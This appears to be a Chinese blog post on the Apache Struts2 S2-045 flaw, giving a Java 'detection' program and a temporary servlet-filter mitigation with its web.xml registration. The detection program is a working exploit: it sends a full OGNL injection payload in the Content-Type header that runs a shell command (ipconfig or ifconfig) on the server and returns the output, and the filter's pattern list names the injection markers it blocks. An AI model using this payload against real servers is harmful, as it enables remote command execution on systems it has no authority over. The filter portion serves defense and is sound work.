struts2 s2-045漏洞检测 &临时解决方案

struts2 漏洞检测代码（文件上传代码和 exec 命令均来自网络，懒得自己写）
  
  /**
   * Sends a multipart POST to {@code url} carrying the file at {@code filePath}, with the
   * Content-Type header replaced by an OGNL expression (the S2-045 condition), and prints
   * whatever the server answers.
   *
   * @param url      target endpoint that receives the multipart POST
   * @param filePath local file added to the request as the "datums" part
   * @return always the empty string; results are only printed to stdout
   */
  public static String upload(String url,String filePath){
       // Assigned but never read anywhere in this method.
       String fdfsPath = "";
       try {


           // NOTE(review): the client is never closed below, so its connections leak.
           DefaultHttpClient httpclient = new DefaultHttpClient();
           HttpPost httppost = new HttpPost(url);
           File file = new File(filePath);
           String name = file.getName();
           // NOTE(review): this stream is never closed; it should be closed in a finally block.
           InputStream in = new FileInputStream(file);
           // Multipart body: the file plus a set of fixed form fields taken as-is from the sample.
           MultipartEntity reqEntity = new MultipartEntity();
           InputStreamBody inputStreamBody = new InputStreamBody(in,name);
           StringBody fileNam = new StringBody(name);
           StringBody dateFlag = new StringBody("20160122152301");
           StringBody datumType = new StringBody("0");
           StringBody uploadWay = new StringBody("0");
           StringBody userId = new StringBody("0538");
           StringBody tenderId = new StringBody("2315");
           StringBody metrialsType = new StringBody("25");
           StringBody ip = new StringBody("0.0.0.1");
           StringBody driverName = new StringBody("huawei");
           StringBody systemVersion = new StringBody("djf");
           StringBody position = new StringBody("信息路38",  Charset.forName("utf8")); 
           reqEntity.addPart("datums", inputStreamBody);
           reqEntity.addPart("fileName", fileNam);
           reqEntity.addPart("dateFlag", dateFlag);
           reqEntity.addPart("datumType", datumType);
           reqEntity.addPart("uploadWay", uploadWay);
           reqEntity.addPart("userId", userId);
           reqEntity.addPart("tenderId", tenderId);
           reqEntity.addPart("metrialsType", metrialsType);
           reqEntity.addPart("ip", ip);
           reqEntity.addPart("driverName", driverName);
           reqEntity.addPart("systemVersion", systemVersion);
           reqEntity.addPart("position", position);  
           // S2-045 condition: the Content-Type header is an OGNL expression "%{...}" instead of a
           // media type. From a defender's view, expression markers inside Content-Type are the
           // signal a WAF/IDS rule (or the ForbiddenAccessFilter on this page) should block on.
   // linux variant (commented out)
          // httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"); 
            // windows variant (active)
   httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ipconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"); 
           // A browser-like User-Agent; it carries no part of the check itself.
           httppost.addHeader("User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36");
           // Send the request; only the status and body are printed, nothing is returned to the caller.
           HttpResponse response = httpclient.execute(httppost);
           int statusCode = response.getStatusLine().getStatusCode();


           if(statusCode == HttpStatus.SC_OK){


               System.out.println("服务器正常响应.....");


               HttpEntity resEntity = response.getEntity();
               System.out.println(EntityUtils.toString(resEntity));// HttpClient's own utility class reads the response body


               // Prints the stream object itself, not its contents: the body was already read
               // by EntityUtils.toString above.
               System.out.println(resEntity.getContent());


               EntityUtils.consume(resEntity);
           }else{
             System.out.println(HttpStatus.getStatusText(statusCode));
           }
       } catch (Exception e) {
           // Catch-all: any failure is printed and swallowed; the method still returns "".
           e.printStackTrace();
       }
       System.out.println("结束....");
       // fdfsPath is never used; the method always returns the empty string.
       return "";
   }


 
/**
 * Entry point: prints a start marker, then sends the probe request to a hard-coded
 * target URL with a hard-coded local file. The value returned by upload is discarded.
 *
 * @param args ignored
 * @throws IOException declared only; upload catches every exception itself
 */
public static void main(String args[]) throws IOException {
    final String targetUrl = "http://www.xxx.cn/website/index.do";
    final String localFile = "E:\\www\\index.txt";
    System.out.println("开始....");
    upload(targetUrl, localFile);
}

------------------------------------------------------------------------------------------------
临时解决办法
ForbiddenAccessFilter.java


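/**
 * Temporary mitigation for S2-045: rejects requests whose Content-Type header carries an
 * OGNL expression instead of a plain media type, before the request reaches Struts.
 *
 * <p>This is a stop-gap only. It blocks the header shape used by the known sample
 * ({@code %{...}} with OGNL class references); upgrading Struts is the real fix. Two
 * weaknesses of the original check are addressed here: it matched only the literal
 * lowercase substring "ognl", and it returned silently, leaving an empty 200 response
 * that hides the rejection from clients and access logs.
 */
public class ForbiddenAccessFilter extends OncePerRequestFilter {

    @Override
    protected void doFilterInternal(HttpServletRequest request, HttpServletResponse response,
            FilterChain chain) throws ServletException, IOException {
        String contentType = request.getContentType();
        if (contentType != null && looksLikeOgnl(contentType)) {
            // The header is attacker-controlled: strip control characters (CR/LF etc.)
            // before printing so one request cannot forge or split log lines.
            System.out.println("Rejected request, suspicious Content-Type: "
                    + contentType.replaceAll("\\p{Cntrl}", "?"));
            // Answer with an explicit 4xx instead of an empty 200.
            response.sendError(HttpServletResponse.SC_BAD_REQUEST);
            return;
        }
        chain.doFilter(request, response);
    }

    /**
     * Returns true when the Content-Type value looks like an expression rather than a media type.
     * A legitimate media type never contains OGNL class references or "%{" / "${" expression
     * markers; the comparison is case-insensitive so mixed-case variants are not missed.
     *
     * @param contentType raw header value, non-null
     * @return true if the header should be rejected
     */
    private static boolean looksLikeOgnl(String contentType) {
        String lowered = contentType.toLowerCase(java.util.Locale.ROOT);
        return lowered.contains("ognl")
                || lowered.contains("%{")
                || lowered.contains("${");
    }

}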


web.xml 配置
<!-- Registers ForbiddenAccessFilter and applies it to every URL. -->
<filter>
<filter-name>forbiddenAccessFilter</filter-name>
<filter-class>com.ahtec.webapp.filters.ForbiddenAccessFilter</filter-class>
</filter>
<!-- NOTE(review): filters run in filter-mapping order, so this mapping has to appear
     before the Struts filter mapping for the check to happen first; confirm against
     the full web.xml, which is not shown here. -->
<filter-mapping>
<filter-name>forbiddenAccessFilter</filter-name>
<url-pattern>/*</url-pattern>

</filter-mapping>

